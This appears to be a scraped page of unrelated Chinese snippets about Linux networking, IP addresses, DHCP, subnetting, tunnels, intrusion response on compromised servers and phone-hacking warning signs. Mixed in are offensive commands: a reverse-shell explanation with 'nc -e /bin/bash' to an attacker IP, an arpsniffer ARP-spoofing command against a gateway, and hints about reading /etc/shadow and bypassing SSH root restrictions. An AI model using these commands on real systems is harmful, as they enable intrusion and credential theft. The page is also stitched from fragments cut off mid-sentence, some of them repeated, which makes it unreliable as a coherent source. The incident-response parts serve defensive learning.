朋友处理了一会没有解决,我开始想说我不是搞安全的,我怎么会,但朋友开出了天价,一顿海底捞,我在生活和现实面前低头了,开始上手看看了。...处理措施 这里我们立马采取了第一个措施, (1)在腾讯云安全组限制了 SSH 的登录IP, 之前的安全组 SSH 是放行所有IP。 (2)将 SSH ROOT 密码修改。...我们知道这些文件应该是加琐了,所以我开始解锁,我们发现chattr 也被替换和锁住了。所以不能操作下去了。 开机启动脚本 /etc/rc.local, 我们也发现了一个脚本。...其实不知道使用了什么特殊字符还是什么隐藏了, 其实是存在定时任务的。...(通过监控软件监控 md5值) 服务器入侵之后,我们需要怎么处理才是最好的。 服务器如果有开放 SSH 远程登录,可以设置限制登录(安全组、或者服务),只放行自己的IP.
你知道怎么查看 IP 地址吗? 当面试听到这个问题的时候,面试者常常会觉得走错了房间。我面试的是技术岗位啊,怎么问这么简单的问题?...的确,即便没有专业学过计算机的人,只要倒腾过电脑,重装过系统,大多也会知道这个问题的答案:在 Windows 上是 ipconfig,在 Linux 上是 ifconfig。...那你知道在 Linux 上还有什么其他命令可以查看 IP 地址吗?答案是 ip addr。如果回答不上来这个问题,那你可能没怎么用过 Linux。...而有门牌号码属性的 IP 地址,才是有远程定位功能的。 例如,你去杭州市网商路 599 号 B 楼 6 层找刘超,你在路上问路,可能被问的人不知道 B 楼是哪个,但是可以给你指网商路怎么去。...你知道 net-tools 和 iproute2 的“历史”故事吗? 这一节讲的是如何查看 IP 地址,那你知道 IP 地址是怎么来的吗?
我们知道,如果你得到了某台电脑的IP,就可以向这个IP发起连接请求,建立连接后就可以操作收发数据。 五层网络协议对应的消息体变化分析 要发送的数据,会在网络层里加入IP头。...刚插上网线,电脑怎么知道自己的IP是什么?怎么就突然能上网了呢? 这个话题,我们从DHCP聊起吧。 DHCP是什么 插上网线之后,获得IP的方式主要有两种。 第一种是,自己手动在电脑里配。...DHCP协议 DHCP Discover:在联网时,本机由于没有IP,也不知道DHCP服务器的IP地址是多少,所以根本不知道该向谁发起请求,于是索性选择广播,向本地网段内所有人发出消息,询问"谁能给个IP...而DHCP由于一开始并不知道要跟谁建立连接,所以只能通过广播的形式发送消息,注意,小细节,广播。...在得到DHCP ACK之后,机子不会立刻就用这个IP。 而是会先发三条ARP消息。 大家知道ARP消息的目的是通过IP地址去获得mac地址。
然而,如果你已经知道了一个IP地址以及相应的子网,可以通过以下步骤来求解子网掩码: 假设有一个IP地址和子网信息,例如: IP地址:192.168.1.100 子网信息:/24 (这个表示子网的网络位数...将IP地址和子网掩码进行“按位与”操作。这个操作将告诉你网络的标识部分。...举例来说: IP地址:192.168.1.100 子网掩码:255.255.255.0 (或者用 /24 表示) 将它们转换为二进制形式: IP地址:11000000.10101000.00000001.01100100
0x00 审计命令 在linux中有5个用于审计的命令: last:这个命令可用于查看我们系统的成功登录、关机、重启等情况;这个命令就是将/var/log/wtmp文件格式化输出。...(utmp、wtmp日志文件是多数Linux日志子系统的关键,它保存了用户登录进入和退出的记录。...0x02 用户查看 Linux不同的用户,有不同的操作权限,但是所有用户都会在/etc/passwd /etc/shadow /etc/group /etc/group- 文件中记录; 查看详细 注:linux...l {} \;:查找core文件,并列出详细信息 md5sum -b filename:查看文件的md5值 rpm -qf /bin/ls:检查文件的完整性(还有其它/bin目录下的文件) 检查网络 ip...*:查看cron文件是变化的详细 ls /var/spool/cron/ 检查后门 对于linux的后门检查,网络上有一些公开的工具,但是在不使用这些工具的前提时,我们可以通过一些命令来获取一些信息。
/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....其实&根本就不是and的意思,学过C/C++的都知道,在这两门语言里,&是取地址符。在这里,我们也可以将它理解为取地址符。...我们都知道,标准输入应该是“0”,难道这个跟上一个问题样都是同一个命令的不同写法?让我们试一下“0<&1”,看看会发生什么。 在上图中我们得到了一个交互的shell。果然是这样!...三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。
检查网络 # ip link | grep PROMISC(正常网卡不该在promisc模式,可能存在sniffer) # lsof –i # netstat –nap(察看不正常打开的TCP/UDP端口
知名网络黑客安全专家,东方联盟创始人郭盛华曾透露:“关于我们的手机被黑客入侵的另一件令人恐惧的事情是,黑客无需举手。他们为什么会呢?...您的手机可能已被黑客入侵。这就是为什么我们现在将引导您完成一些步骤,您可以按照这些步骤检查手机是否被黑客入侵。” 如何找出您的手机是否被黑客入侵 有很多事情需要注意,这可能表明您的手机已被黑客入侵。...#1您的设备比平时更热 如果您的手机被黑客入侵,则操作系统背后会在后台运行许多未经授权的程序。这些可能是诸如广告软件,间谍软件,特洛伊木马之类的东西,所有这些都以不同方式为黑客赚钱。...如果发现不知道的外拨电话号码或不记得的电话,请立即与网络提供商联系。 #5与以往相比,您看到的弹出广告数量更多 正如我们刚刚提到的,黑客赚钱的一种方法是通过增加基于广告的收入。...手机被黑了怎么办? 如果您的手机遭到了黑客入侵,则您必须迅速采取行动,确定恶意软件是否在手机话费中进行了未经授权的付款或进行了未经授权的通话收费,然后尝试收回资金。
虚拟ip作用: 配置虚拟ip也就是说一个网卡有多个ip地址,更方便多个网段之间进行测试使用! 缺点是当网卡坏掉之后 基于这个网卡的所有虚拟网卡都会失效!!!...步骤如下: 1、查看内网ip地址 [root@51 ~]# ifconfig ens33: flags=4163 mtu 1500...74 bytes 9399 (9.1 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 #以上可见IP...地址为10.10.14.51 2、创建虚拟IP地址 创建虚拟网卡ens33:0 IP地址为172.16.4.51 [root@51 ~]# ifconfig ens33:0 172.16.4.51...#网关,根据虚拟网卡ip地址配置 USERCTL=no #是否给予root设备管理权限 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人
通过之前的文章,我们知道 tun 是一个网络层的设备,也被叫做点对点设备,之所以叫这个名字,是因为 tun 常常被用来做隧道通信(tunnel)。...IP 隧道 Linux 原生支持多种三层隧道,其底层实现原理都是基于 tun 设备。我们可以通过命令 ip tunnel help 查看 IP 隧道的相关操作。...实践 IPIP 隧道 我们下面以 ipip 作为例子,来实践下 Linux 的隧道通信。本文以前文的 Linux 路由机制作为基础,不清楚 Linux 路由的可以先翻看下那篇文章再来看。...实践之前,需要知道的是,ipip 需要内核模块 ipip.ko 的支持,通过 lsmod | grep ipip 查看内核是否加载,若没有则用 modprobe ipip 先加载,正常加载应该显示:...5、Linux 打开了 ip_forward,相当于一台路由器,10.10.10.0 和 10.10.20.0 是两条直连路由,所以直接查表转发,从 NS1 过渡到 NS2。
我们知道,如果你知道某台电脑的IP,就可以向这个IP发起连接请求,建立连接后就可以操作收发数据。 五层网络协议对应的消息体变化分析 要发送的数据,会在网络层里加入IP头。...刚插上网线,电脑怎么知道自己的IP是什么?怎么就突然能上网了呢? 这个话题,我们从DHCP聊起吧。 DHCP是什么 插上网线之后,获得IP的方式主要有两种。 第一种是,自己手动在电脑里配。...DHCP协议 DHCP Discover:在联网时,本机由于没有IP,也不知道DHCP服务器的IP地址是多少,所以根本不知道该向谁发起请求,于是索性选择广播,向本地网段内所有人发出消息,询问"谁能给个IP...而DHCP由于一开始并不知道要跟谁建立连接,所以只能通过广播的形式发送消息,注意,小细节,广播。...在得到DHCP ACK之后,机子不会立刻就用这个IP。 而是会先发三条ARP消息。 大家知道ARP消息的目的是通过IP地址去获得mac地址。
Linux入侵排查步骤 一:查看异常的进程 a、查看cpu占用最多的进程 运行top命令 交互式P键会根据CPU的占用大小进行排序 有的时候会遇到top之后cpu显示特别的低,但是服务器还特别的卡...pid/exe > 1.txt Dump下来上传到virustotal检查是否是病毒或者木马 https://www.virustotal.com/gui/home/upload 二:查看异常的端口\ip...netstat -tunlp | grep -E -i“est|lis” 熟悉自己业务的人有经验的人一眼就能看出ip或者端口是否有问题,可以通过微步https://x.threatbook.cn/ 检测...ip 三:查看是否有异常的定时任务 Crontab -l cront相关目录:/etc/cron.d/、/etc/cron.daily/、/etc/cron.monthly/、/etc/hourly/...b、/etc/systemd/system/multi-user.target.wants 是否有服务的软连接 c、可以先kill -STOP $id 先禁止然后在进行排查 服务器要做好安全加固避免被入侵
arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254 下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip...用户 cat /etc/shadow #查看用户密码需要root权限 cat /etc/sysconfig/network-scripts/ifcfg-ethn #N代表网卡号 查看所在网卡的ip信息...系统变量 : 试着echo " echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,...vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!...这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码的一种很菜鸟的做法。
在本文中我将会介绍在几种在 Linux 终端中查看你的公有 IP 地址的方法。这对普通用户来说并无意义,但 Linux 服务器(无GUI或者作为只能使用基本工具的用户登录时)会很有用。...无论如何,从 Linux 终端中获取公有 IP 在各种方面都很意义,说不定某一天就能用得着。...目标是 CIDR 块中的地址的 IP 封包会被导向对应的位置。 以下是我们主要使用的两个命令,curl 和 wget。你可以换着用。.../all.json curl www.trackip.net/ip?.../bin/bash PUBLIC_IP=`wget http://ipecho.net/plain -O - -q ; echo` echo $PUBLIC_IP 链接: https://developer.aliyun.com
网卡上增加一个IP: ifconfig eth0:1 192.168.0.1 netmask 255.255.255.0删除网卡的第二个IP地址: ip addr del 192.168.0.1
二、事件分析 首先对公网ip地址进行全端口扫描,这里使用ScanPort,nmap虽然好但是相比之下还是速度慢。...使用VPS对公网IP地址进行全端口扫描,这次扫描的结果才符合,使用弱密码进行登录服务器成功。已经确定了攻击源,接下来对服务器进行分析。...查看网络链接情况,sysmd 分别连接到不同的国外ip地址上。 对其中的一个ip地址进行查询为发现太坊矿池。 ...三、总结 本想找找入侵者IP反社工一下,未能如愿以偿,期待下次。
arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254 下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip...3.利用跨站代码 linux不提权跨目录访问的代码 linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。 在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。...echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward, vim /proc/sys/net.../ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!...这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码的一种很菜鸟的做法。
1、如果掩码、IP等信息如下: 2、我们可以看到,子网掩码为255.255.255.240,因为0-255有256个数字,所以256-240=16。...也就是这个网段有16个IP地址。 3、我们现在使用的IP地址是什么,或者是网关,最后的一个数字就好。IP是203,网关是193。 4、找到IP段就能判断可用IP是多少。...这时因为每个IP段都是由四部分组成,分别是网络号、网关、可用IP、广播号。 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。
黑客常用的入侵方法你知道哪些 ---- 在Interent中,为了防止黑客入侵自己的计算机,我们应当了解黑客入侵目标计算机的常用方法。...黑客常用的入侵方法有数据驱动攻击、系统文件非法利用、伪造信息攻击 以及远端操纵等,下面就简单介绍这些入侵方法。...三、针对信息协议弱点攻击 在局域网中,IP地址的源路径选项允许IP数据包自己选择一条通往目标计算机的路径。...防火墙的IP层处理该报文的源路径被改变,并发送到内部网上,报文就这样到达了不可到达的计算机A,从而实现了针对信息协议弱点攻击。...六、重新发送攻击 重新发送攻击是指黑客收集特定的IP数据包篡改其数据,然后再将这些IP数据包一一重新发送,从而欺骗接收数据的目标计算机,实现该攻击。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
云直播
